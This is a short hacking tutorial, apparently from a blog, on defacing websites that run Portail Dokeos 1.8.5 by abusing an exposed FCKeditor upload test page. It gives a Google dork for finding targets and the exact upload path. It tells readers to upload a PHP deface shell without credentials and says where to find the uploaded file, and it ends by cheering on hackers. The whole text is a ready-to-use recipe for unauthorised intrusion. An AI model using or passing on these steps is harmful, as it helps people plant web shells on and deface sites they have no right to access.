So lets get started...
Using this vulnerability hacker can upload shell or webpage without knowing user name or password.
To do this you need two things :
Google Dork : "Portail Dokeos 1.8.5"
(search for the string that is inside double quotes that we call a google dork)
Exploit : http://websitename/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
(Its usually a url that hacker put to run his shell/you can say here uploading webpage)
Things that you need to do
Goto : http://websitename/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
change asp into PHP like FCK editor and Upload you deface shell or file, You can upload, .html .php .jpg .txt formats here To view your uploaded file go here : http://websitename/patch/main/upload/your file here
Live Demo :
Output results :
More such url for practice:
Good Luck Hcakers Stay awake for many such tutorials :)